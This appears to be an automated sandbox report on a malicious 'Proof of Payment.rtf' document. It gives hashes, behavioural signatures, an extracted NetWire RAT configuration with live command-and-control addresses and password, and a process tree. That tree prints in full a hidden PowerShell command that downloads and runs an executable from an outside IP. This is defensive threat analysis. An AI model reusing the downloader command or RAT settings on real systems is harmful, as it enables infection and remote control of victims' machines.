Analysis
- max time kernel: 148s
- max time network: 151s
- platform: windows7_x64
- resource: win7-20220414-en
- resource tags: arch:x64, arch:x86, image:win7-20220414-en, locale:en-us, os:windows7-x64, system
- submitted: 15-07-2022 11:54

Static task: static1
Behavioral task: behavioral1
- Sample: Proof of Payment.rtf
- Resource: win7-20220414-en
Behavioral task: behavioral2
- Sample: Proof of Payment.rtf
- Resource: win10v2004-20220414-en

General
- Target: Proof of Payment.rtf
- Size: 230KB
- MD5: ccb4d123d7d23778dc3b804f8b4c551a
- SHA1: 6abaeacc98255a7a8048f0a62a7b983720c904da
- SHA256: c4155eb3caee31efbcf7672f25c39e875b81bba26400cf0c4d4840e534491122
- SHA512: 0ae4ac069b843d2bb45064a29fed582970d15621135ef5b584f10d7aee6be71a049085f317161eb3980cc05efcd65d1c3aefb98c3bd1a1139286d03934367cca
Malware Config
Extracted
- http://192.3.194.246/new.exe
Extracted: netwire
- 194.5.98.188:3364
- 194.5.98.188:3366
- activex_autorun: false
- copy_executable: false
- delete_original: false
- host_id: HostId-%Rand%
- keylogger_dir: %AppData%\Logs\
- lock_executable: false
- offline_keylogger: true
- password: j5m52xuc
- registry_autorun: false
- use_mutex: false
Signatures
-
NetWire RAT payload 12 IoCs
resource | yara_rule
- behavioral1/memory/1880-124-0x0000000000400000-0x0000000000433000-memory.dmp | netwire
- behavioral1/memory/1880-125-0x0000000000400000-0x0000000000433000-memory.dmp | netwire
- behavioral1/memory/1880-123-0x0000000000400000-0x0000000000433000-memory.dmp | netwire
- behavioral1/memory/1880-127-0x0000000000400000-0x0000000000433000-memory.dmp | netwire
- behavioral1/memory/1880-128-0x0000000000400000-0x0000000000433000-memory.dmp | netwire
- behavioral1/memory/1880-129-0x000000000040242D-mapping.dmp | netwire
- behavioral1/memory/1880-132-0x0000000000400000-0x0000000000433000-memory.dmp | netwire
- behavioral1/memory/1880-133-0x0000000000400000-0x0000000000433000-memory.dmp | netwire
- behavioral1/memory/676-152-0x000000000040242D-mapping.dmp | netwire
- behavioral1/memory/1608-168-0x000000000040242D-mapping.dmp | netwire
- behavioral1/memory/676-172-0x0000000000400000-0x0000000000433000-memory.dmp | netwire
- behavioral1/memory/1608-173-0x0000000000400000-0x0000000000433000-memory.dmp | netwire
-
Process spawned unexpected child process 6 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: powershell.exe, cmd.exe, powershell.exe, cmd.exe, powershell.exe, cmd.exe
description | pid | pid_target | process | target process
- Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 1052 | 1048 | powershell.exe | WINWORD.EXE
- Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 1504 | 1048 | cmd.exe | WINWORD.EXE
- Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 1300 | 1048 | powershell.exe | WINWORD.EXE
- Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 2020 | 1048 | cmd.exe | WINWORD.EXE
- Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 1464 | 1048 | powershell.exe | WINWORD.EXE
- Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 1160 | 1048 | cmd.exe | WINWORD.EXE
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Blocklisted process makes network request 1 IoCs
Processes: powershell.exe
flow | pid | process
- 4 | 1052 | powershell.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes: new.exe, new.exe, new.exe
pid | process
- 1548 | new.exe
- 1344 | new.exe
- 1676 | new.exe
-
Loads dropped DLL 3 IoCs
Processes: cmd.exe, cmd.exe, cmd.exe
pid | process
- 1504 | cmd.exe
- 2020 | cmd.exe
- 1160 | cmd.exe
-
Suspicious use of SetThreadContext 3 IoCs
Processes: new.exe, new.exe, new.exe
description | pid | process | target process
- PID 1548 set thread context of 1880 | 1548 | new.exe | InstallUtil.exe
- PID 1344 set thread context of 676 | 1344 | new.exe | InstallUtil.exe
- PID 1676 set thread context of 1608 | 1676 | new.exe | InstallUtil.exe
-
Drops file in Windows directory 1 IoCs
Processes: WINWORD.EXE
description | ioc | process
- File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Modifies Internet Explorer settings
Processes: WINWORD.EXE
Modifies registry class 64 IoCs
Processes: WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: WINWORD.EXE
pid | process
- 1048 | WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes: powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, new.exe, new.exe, new.exe
pid | process
- 1052 | powershell.exe
- 1772 | powershell.exe
- 1300 | powershell.exe
- 1464 | powershell.exe
- 544 | powershell.exe
- 1916 | powershell.exe
- 1548 | new.exe
- 1548 | new.exe
- 1344 | new.exe
- 1344 | new.exe
- 1676 | new.exe
- 1676 | new.exe
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes: powershell.exe, new.exe, powershell.exe, powershell.exe, new.exe, powershell.exe, new.exe, powershell.exe, powershell.exe
description | pid | process
- Token: SeDebugPrivilege | 1052 | powershell.exe
- Token: SeDebugPrivilege | 1548 | new.exe
- Token: SeDebugPrivilege | 1772 | powershell.exe
- Token: SeDebugPrivilege | 1300 | powershell.exe
- Token: SeDebugPrivilege | 1344 | new.exe
- Token: SeDebugPrivilege | 1464 | powershell.exe
- Token: SeDebugPrivilege | 1676 | new.exe
- Token: SeDebugPrivilege | 544 | powershell.exe
- Token: SeDebugPrivilege | 1916 | powershell.exe
-
Suspicious use of SetWindowsHookEx 4 IoCs
Processes: WINWORD.EXE
pid | process
- 1048 | WINWORD.EXE
- 1048 | WINWORD.EXE
- 1048 | WINWORD.EXE
- 1048 | WINWORD.EXE
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: WINWORD.EXE, cmd.exe, new.exe, cmd.exe, cmd.exe, new.exe, new.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (PID 1048, depth 1)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Proof of Payment.rtf"
  Signatures:
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1052, depth 2, child of 1048)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.246/new.exe','C:\Users\Admin\AppData\Roaming\new.exe')
      Signatures:
      - Process spawned unexpected child process
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe (PID 1504, depth 2, child of 1048)
      Command line: "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\new.exe
      Signatures:
      - Process spawned unexpected child process
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Roaming\new.exe (PID 1548, depth 3, child of 1504)
          Command line: C:\Users\Admin\AppData\Roaming\new.exe
          Signatures:
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1772, depth 4, child of 1548)
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
              (the -enc argument is UTF-16LE base64 and decodes to: Start-Sleep -Seconds 20)
              Signatures:
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

            C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (PID 1880, depth 4, child of 1548)
              Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1300, depth 2, child of 1048)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.246/new.exe','C:\Users\Admin\AppData\Roaming\new.exe')
      Signatures:
      - Process spawned unexpected child process
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe (PID 2020, depth 2, child of 1048)
      Command line: "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\new.exe
      Signatures:
      - Process spawned unexpected child process
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Roaming\new.exe (PID 1344, depth 3, child of 2020)
          Command line: C:\Users\Admin\AppData\Roaming\new.exe
          Signatures:
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 544, depth 4, child of 1344)
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
              (the -enc argument is UTF-16LE base64 and decodes to: Start-Sleep -Seconds 20)
              Signatures:
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

            C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (PID 676, depth 4, child of 1344)
              Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1464, depth 2, child of 1048)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://192.3.194.246/new.exe','C:\Users\Admin\AppData\Roaming\new.exe')
      Signatures:
      - Process spawned unexpected child process
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe (PID 1160, depth 2, child of 1048)
      Command line: "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\new.exe
      Signatures:
      - Process spawned unexpected child process
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Roaming\new.exe (PID 1676, depth 3, child of 1160)
          Command line: C:\Users\Admin\AppData\Roaming\new.exe
          Signatures:
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory

            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1916, depth 4, child of 1676)
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
              (the -enc argument is UTF-16LE base64 and decodes to: Start-Sleep -Seconds 20)
              Signatures:
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken

            C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe (PID 1608, depth 4, child of 1676)
              Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

    C:\Windows\splwow64.exe (PID 2004, depth 2, child of 1048)
      Command line: C:\Windows\splwow64.exe 12288
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: b89e63484dc9c78b94f63337a140cc11
  SHA1: 394026ca31ad6ad3a73584dbd345fe64eb29114c
  SHA256: e1f8ae4c0de824fd9e14c579273577a18334bb80db59192e8319f6887ea2744a
  SHA512: 9b30b4178b76a76bb087d3ef7a4807b9244ee53689e22fc66a41ee10443923fb9623f73cd5e0b4c7b1415fdea00e3076f7f464f6019637445b870a60f3858502
- (no path recorded; these are the well-known digests of an empty, zero-byte file)
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
- (no path recorded)
  Filesize: 75KB
  MD5: 59b5570fd782ef0503a49fd7470200b6
  SHA1: 1738e6b2ecb79b85e950a9734469404002cbb195
  SHA256: f621b17f07a862cf0dd4c87aaef881dc2a39e36f73900025169aa34c99d0a650
  SHA512: 2fd88fce69174fd1f84866ebc99e1f31e2ef8e4af4606871953d4eafa56b029f2bd039bab14c6b847368ecddab148b08bf4c28f6e820e18f14784c40a8a42135